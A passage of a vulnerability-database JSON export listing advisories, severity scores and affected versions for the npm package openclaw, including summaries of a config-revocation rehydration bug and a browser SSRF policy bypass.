"VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "GHSA-2j53-2c28-g9v2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-z3rc-xpx7-fkcu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90164?format=api", "vulnerability_id": "VCID-z7wa-tw2t-vqas", "summary": "OpenClaw: Tlon Startup Migration Rehydrates Empty-Array Revocations From File Config\n## Summary\nTlon Startup Migration Rehydrates Empty-Array Revocations From File Config\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: v2026.3.28 startup migration still treats empty-array settings as missing and can rehydrate revoked Tlon config from file state after restart.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a4d72a83f01fedd35964c352e3473c7712a3511b` — 2026-03-31T14:57:03+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41388", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12844", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12883", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12878", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41388" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/a4d72a83f01fedd35964c352e3473c7712a3511b", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:28:29Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/a4d72a83f01fedd35964c352e3473c7712a3511b" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3pm9-5j7m-59vc", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:28:29Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3pm9-5j7m-59vc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41388", "reference_id": "CVE-2026-41388", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41388" }, { "reference_url": "https://github.com/advisories/GHSA-3pm9-5j7m-59vc", "reference_id": "GHSA-3pm9-5j7m-59vc", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3pm9-5j7m-59vc" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-configuration-rehydration-via-empty-array-revocation-handling", "reference_id": "openclaw-configuration-rehydration-via-empty-array-revocation-handling", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:28:29Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-configuration-rehydration-via-empty-array-revocation-handling" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41388", "GHSA-3pm9-5j7m-59vc" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-z7wa-tw2t-vqas" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90293?format=api", "vulnerability_id": "VCID-z8mj-pnbe-wqej", "summary": "OpenClaw has Browser SSRF Policy Bypass via Interaction-Triggered Navigation\n## Impact\n\nBrowser SSRF Policy Bypass via Interaction-Triggered Navigation.\n\nBrowser interactions could trigger navigations that bypassed the normal SSRF navigation checks.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.5`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @ccreater222 and @KeenSecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41912", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10088", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10102", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10118", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41912" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vr5g-mmx7-h897", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vr5g-mmx7-h897" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41912", "reference_id": "CVE-2026-41912", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41912" }, { "reference_url": "https://github.com/advisories/GHSA-vr5g-mmx7-h897", "reference_id": "GHSA-vr5g-mmx7-h897", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vr5g-mmx7-h897" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, 